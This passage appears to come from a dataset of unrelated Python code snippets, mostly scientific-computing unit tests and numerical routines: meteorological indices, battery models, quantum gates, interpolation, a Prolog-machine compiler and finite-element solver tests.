487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, 
temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_current_density_boundaries(self):\n t, x_n, x_p = self.t, self.x_n_edge, self.x_p_edge\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n np.testing.assert_array_almost_equal(self.i_s_n(t, x_n[0]), i_cell, decimal=2)\n np.testing.assert_array_almost_equal(self.i_s_n(t, x_n[-1]), 0, decimal=4)\n np.testing.assert_array_almost_equal(self.i_s_p(t, x_p[-1]), i_cell, decimal=3)\n np.testing.assert_array_almost_equal(self.i_s_p(t, x_p[0]), 0, decimal=4)", "def test_output_range(self):\n byt = bytscl(self.array1)\n outside = (byt < 0) | (byt > 255)\n total = numpy.sum(outside)\n self.assertEqual(total, 0)", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def coordination(c, stencil=nn_stencil):\n\n coordination = np.zeros_like(c, dtype=int)\n for dx, dy in stencil:\n tmp = np.array(c, dtype=bool, copy=True)\n if dx != 0:\n tmp = np.roll(tmp, dx, 0)\n if dy != 0:\n tmp = np.roll(tmp, dy, 1)\n coordination += tmp\n return coordination", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = 
numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_conservation(self):\n t, x_n, x_s, x_p = self.t, self.x_n, self.x_s, self.x_p\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n for x in [x_n, x_s, x_p]:\n np.testing.assert_array_almost_equal(\n self.i_s(t, x) + self.i_e(t, x), i_cell, decimal=2\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_n), self.i_s_n(t, x_n), decimal=3\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_p), self.i_s_p(t, x_p), decimal=3\n )", "def at_loc((x, y), (cx, cy), eps=0.000035):\n\treturn (x - cx)**2 + (y - cy)**2 <= eps**2", "def test_outside_plus_inside(self):\n for region, bounds in load_region_bounds_dict().items():\n lon_bounds, lat_bounds = bounds\n for key in ['data01', 'ds_shift_lon', 'ds_rev_both', 'ds_irr_both']:\n outside_data = climapy.xr_mask_bounds(data_dict[key],\n lon_bounds=lon_bounds, lat_bounds=lat_bounds,\n select_how='outside')['PRECL']\n inside_data = climapy.xr_mask_bounds(data_dict[key],\n lon_bounds=lon_bounds, lat_bounds=lat_bounds,\n select_how='inside')['PRECL']\n outside_plus_inside = (np.nan_to_num(outside_data.values) +\n np.nan_to_num(inside_data.values))\n diff_from_input = outside_plus_inside - data_dict[key]['PRECL'].values\n assert np.abs(diff_from_input).max() == 0", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def unityTestChangeOfCoordinates(map, ClosedLoopData):\n TestResult = 1\n for i in range(0, ClosedLoopData.x.shape[0]):\n xdat = ClosedLoopData.x\n xglobdat = ClosedLoopData.x_glob\n\n s, ey, _, _ = map.getLocalPosition(xglobdat[i, 4], xglobdat[i, 5], xglobdat[i, 3])\n v1 = np.array([s, ey])\n v2 = np.array(xdat[i, 4:6])\n v3 = np.array(map.getGlobalPosition(v1[0], v1[1]))\n v4 = np.array([xglobdat[i, 4], xglobdat[i, 5]])\n # print v1, v2, np.dot(v1 - v2, v1 - v2), np.dot(v3 - v4, v3 - v4)\n\n if np.dot(v3 - v4, v3 - v4) > 0.00000001:\n TestResult = 0\n print (\"ERROR\", v1, v2, v3, v4)\n pdb.set_trace()\n v1 = np.array(map.getLocalPosition(xglobdat[i, 4], xglobdat[i, 5]))\n v2 = np.array(xdat[i, 4:6])\n v3 = np.array(map.getGlobalPosition(v1[0], v1[1]))\n v4 = np.array([xglobdat[i, 4], xglobdat[i, 5]])\n print (np.dot(v3 - v4, v3 - v4))\n pdb.set_trace()\n\n if TestResult == 1:\n print (\"Change of coordinates test passed!\")", "def evaluable_view(self, stencil, offset=0):\n return self._evaluable_view(stencil, self.arr, offset)", "def inner_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(c, coordination(c, stencil=stencil) < len(stencil))", "def _evaluate(self, w, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n 
self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[y_pos - 1][z_pos - 1](w, x)\n + (1 - alpha) * beta * self.wxInterpolators[y_pos - 1][z_pos](w, x)\n + alpha * (1 - beta) * self.wxInterpolators[y_pos][z_pos - 1](w, x)\n + alpha * beta * self.wxInterpolators[y_pos][z_pos](w, x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[i - 1][j - 1](w[c], x[c])\n + (1 - alpha)\n * beta\n * self.wxInterpolators[i - 1][j](w[c], x[c])\n + alpha\n * (1 - beta)\n * self.wxInterpolators[i][j - 1](w[c], x[c])\n + alpha * beta * self.wxInterpolators[i][j](w[c], x[c])\n )\n return f", "def check_ext(im, i, j):\n neighb = 0\n count = 0\n for a in range(8):\n if (im[i+relpos[a][0], j+relpos[a][1]] and (count == 0)):\n count += 1\n neighb += 1\n else:\n count = 0\n return (neighb < 2)", "def test_bin_op_support():\n check_peval_expression(\"1 + 2\", {}, \"3\", fully_evaluated=True, expected_value=3)\n check_peval_expression(\"2 - 1\", {}, \"1\", fully_evaluated=True, expected_value=1)\n check_peval_expression(\"2 * 3\", {}, \"6\", fully_evaluated=True, expected_value=6)\n check_peval_expression(\"9 / 2\", {}, \"4.5\", fully_evaluated=True, expected_value=4.5)\n check_peval_expression(\"9 // 2\", {}, \"4\", fully_evaluated=True, expected_value=4)\n check_peval_expression(\"9 % 2\", {}, \"1\", fully_evaluated=True, expected_value=1)\n check_peval_expression(\"2 ** 4\", {}, \"16\", fully_evaluated=True, expected_value=16)\n check_peval_expression(\"3 << 2\", {}, \"12\", fully_evaluated=True, expected_value=12)\n check_peval_expression(\"64 >> 3\", {}, \"8\", fully_evaluated=True, expected_value=8)\n check_peval_expression(\"17 | 3\", {}, \"19\", fully_evaluated=True, expected_value=19)\n check_peval_expression(\"17 ^ 3\", {}, \"18\", fully_evaluated=True, expected_value=18)\n check_peval_expression(\"17 & 3\", {}, \"1\", fully_evaluated=True, expected_value=1)", "def test_solvers_bc():\n tol = 3E-12 # Appropriate tolerance for these tests (P2, 20x20 mesh)\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x**2 + 2*y**2\n f = -sym.diff(u, x, 2) - sym.diff(u, y, 2)\n f = sym.simplify(f)\n u_00 = u.subs(x, 0) # x=0 boundary\n u_01 = u.subs(x, 1) # x=1 boundary\n g = -sym.diff(u, y).subs(y, 1) # x=1 boundary\n r = 1000 # arbitrary function can go here\n s = u\n\n # Turn to C/C++ code for UFL expressions\n f = sym.printing.ccode(f)\n u_00 = sym.printing.ccode(u_00)\n u_01 = sym.printing.ccode(u_01)\n g = sym.printing.ccode(g)\n r = sym.printing.ccode(r)\n s = sym.printing.ccode(s)\n print('Test problem (C/C++):\\nu = %s\\nf = %s' % (u, f))\n print('u_00: %s\\nu_01: %s\\ng = %s\\nr = %s\\ns = %s' %\n (u_00, u_01, g, r, s))\n\n # Turn into FEniCS objects\n u_00 = Expression(u_00)\n u_01 = Expression(u_01)\n f = Expression(f)\n g = Expression(g)\n r = Expression(r)\n s = Expression(s)\n 
u_exact = Expression(sym.printing.ccode(u))\n\n # Define boundary conditions\n boundary_conditions = {0: {'Dirichlet': u_00},\n 1: {'Dirichlet': u_01},\n 2: {'Robin': (r, s)},\n 3: {'Neumann': g}}\n\n for Nx, Ny in [(3,3), (3,5), (5,3), (20,20)]:\n for degree in 1, 2, 3:\n for linear_solver in ['direct']:\n print('solving on 2(%dx%dx) mesh with P%d elements'\n % (Nx, Ny, degree)),\n print(' %s solver, %s function' %\n (linear_solver, solver_func.__name__))\n kappa = Constant(1)\n u, kappa = solver_bc(\n kappa, f, boundary_conditions, Nx, Ny, degree,\n linear_solver=linear_solver,\n abs_tol=0.1*tol,\n rel_tol=0.1*tol)\n # Make a finite element function of the exact u_D\n V = u.function_space()\n u_e_Function = interpolate(u_exact, V) # exact solution\n # Check that dof arrays are equal\n u_e_array = u_e_Function.vector().array() # dof values\n max_error = (u_e_array - u.vector().array()).max()\n msg = 'max error: %g for 2(%dx%d) mesh, degree=%d,'\\\n ' %s solver, %s' % \\\n (max_error, Nx, Ny, degree, linear_solver,\n solver_func.__name__)\n print(msg)\n assert max_error < tol, msg", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def inter_op_dp_inner_loop(\n n_layers, n_devices, submesh_sizes, valid_idxs_costs, max_n_succ_stages\n):\n F = np.full((n_layers + 1, n_layers + 1, n_devices + 1), np.inf, dtype=np.float32)\n F_stage_max = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1), 0.0, dtype=np.float32\n )\n F_argmin = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1, 3), -1, dtype=np.int32\n )\n F[0, n_layers, 0] = 0\n\n for d in range(1, n_devices + 1):\n for (\n l,\n i,\n submesh_shape_idx,\n sharding_config_idx,\n stage_cost,\n ) in valid_idxs_costs:\n l, i, submesh_shape_idx, sharding_config_idx = map(\n int, (l, i, submesh_shape_idx, sharding_config_idx)\n )\n\n n_submesh_devices = submesh_sizes[submesh_shape_idx]\n 
if n_submesh_devices <= d:\n for s in range(1, n_layers + 1):\n if (\n s - 1\n > max_n_succ_stages[\n l, i, submesh_shape_idx, sharding_config_idx\n ]\n ):\n continue\n\n new_cost = F[s - 1, i + 1, d - n_submesh_devices] + stage_cost\n if new_cost < F[s, l, d]:\n F[s, l, d] = new_cost\n F_argmin[s, l, d] = (\n i + 1,\n submesh_shape_idx,\n sharding_config_idx,\n )\n F_stage_max[s, l, d] = max(\n F_stage_max[s - 1, i + 1, d - n_submesh_devices], stage_cost\n )\n\n return F, F_stage_max, F_argmin", "def test_expression(x, y, z):\n return x * y + y / z", "def evaluateStructure(compiled_expression):", "def test_data_norange(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n lensumrange = random.randint(1, 10)\n\n ex.nreps = nreps\n ex.sumrange = [\"j\", range(lensumrange)]\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"Y\"][\"with\"].add(\"j\")\n ex.vary[\"Y\"][\"along\"] = 0\n ex.vary[\"Z\"][\"with\"].update([\"rep\", \"j\"])\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], cmds)\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", idx * m * n, \"X_%d\" % idx], cmds)\n\n self.assertIn([\n \"dmalloc\", \"Y\", lensumrange * m * m + (lensumrange - 1) * m\n ], cmds)\n idx = random.randint(0, lensumrange - 1)\n self.assertIn([\"doffset\", \"Y\", idx * m, \"Y_%d\" % idx], cmds)\n\n self.assertIn([\"cmalloc\", \"Z\", nreps * lensumrange * n * n], cmds)\n idxrep = random.randint(0, nreps - 1)\n idxrange = random.randint(0, lensumrange - 1)\n self.assertIn([\"coffset\", \"Z\",\n (idxrep * lensumrange + idxrange) * n * n,\n \"Z_%d_%d\" % (idxrep, idxrange)], cmds)", "def test_ex_2_8(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n instrs = compiler.compile_query_m1(query)\n self.assertEqual(instrs, [\n put_structure(('f', 1), 1),\n set_variable(4),\n put_structure(('a', 0), 7),\n put_structure(('f', 1), 6),\n set_value(7),\n put_structure(('h', 2), 2),\n set_variable(5),\n set_value(6),\n put_value(5, 3),\n call(('p', 3))\n ])\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n instrs = compiler.compile_program_m1(program)\n self.assertEqual(instrs, [\n get_variable(4, 1),\n get_structure(('h', 2), 2),\n unify_value(4),\n unify_variable(5),\n get_structure(('f', 1), 3),\n unify_value(5),\n proceed()\n ])", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * 
(1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_arithmetic(self):\n denominator_lower_bound = 0.0\n global_step = tf.Variable(0, dtype=tf.int32)\n evaluation_context = basic_expression.BasicExpression.EvaluationContext(\n denominator_lower_bound, global_step)\n\n penalty_values = [-3.6, 1.5, 0.4]\n constraint_values = [-0.2, -0.5, 2.3]\n\n # Create three expressions containing the constants in \"penalty_values\" in\n # their penalty_expressions, and \"constraint_values\" in their\n # constraint_expressions.\n expression_objects = []\n for penalty_value, constraint_value in zip(penalty_values,\n constraint_values):\n expression_object = expression.Expression(\n basic_expression.BasicExpression([],\n tf.constant(\n penalty_value,\n dtype=tf.float32)),\n basic_expression.BasicExpression([], tf.constant(constraint_value)))\n expression_objects.append(expression_object)\n\n # This expression exercises all of the operators.\n expression_object = (\n 0.3 - (expression_objects[0] / 2.3 + 0.7 * expression_objects[1]) -\n (1.2 + expression_objects[2] - 0.1) * 0.6 + 0.8)\n\n actual_penalty_value, _, _ = expression_object.penalty_expression.evaluate(\n evaluation_context)\n actual_constraint_value, _, _ = (\n expression_object.constraint_expression.evaluate(evaluation_context))\n\n # This is the same expression as above, applied directly to the python\n # floats.\n expected_penalty_value = (\n 0.3 - (penalty_values[0] / 2.3 + 0.7 * penalty_values[1]) -\n (1.2 + penalty_values[2] - 0.1) * 0.6 + 0.8)\n expected_constraint_value = (\n 0.3 - 
(constraint_values[0] / 2.3 + 0.7 * constraint_values[1]) -\n (1.2 + constraint_values[2] - 0.1) * 0.6 + 0.8)\n\n with self.session() as session:\n session.run(\n [tf.global_variables_initializer(),\n tf.local_variables_initializer()])\n\n self.assertNear(\n expected_penalty_value, session.run(actual_penalty_value), err=1e-6)\n self.assertNear(\n expected_constraint_value,\n session.run(actual_constraint_value),\n err=1e-6)", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation # RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_evaluate_index_of_expression(self):\n value = self.evaluate_common(\"indexof('startswith','tart')\")\n self.assertTrue(\n value.type_code == edm.SimpleType.Int32, \"Expected Int32\")\n self.assertTrue(value.value == 1)\n value = self.evaluate_common(\"indexof('startswith','start')\")\n self.assertTrue(value.value == 0)\n value = self.evaluate_common(\"indexof('startswith','t')\")\n self.assertTrue(value.value == 1)\n # not case insensitive\n value = self.evaluate_common(\"indexof('startswith','W')\")\n self.assertTrue(value.value == -1)\n try:\n value = self.evaluate_common(\"indexof('3.14',1)\")\n self.fail(\"integer as parameter\")\n except odata.EvaluationError:\n pass\n try:\n value = self.evaluate_common(\"indexof('3.14')\")\n self.fail(\"1 parameter\")\n except odata.EvaluationError:\n pass", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = 
s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_sipm_indx(mc_sns_sipm_map):\n XL = mc_sns_sipm_map.sipm_map.xl.values\n XR = mc_sns_sipm_map.sipm_map.xr.values\n YU = mc_sns_sipm_map.sipm_map.yu.values\n YD = mc_sns_sipm_map.sipm_map.yd.values\n\n DX = [xr - xl if xl != NN and xr != NN else 2 for xl,xr in zip(XL, XR) ]\n t1 = np.allclose(DX, 2, rtol=1e-03, atol=1e-03)\n return t1", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n 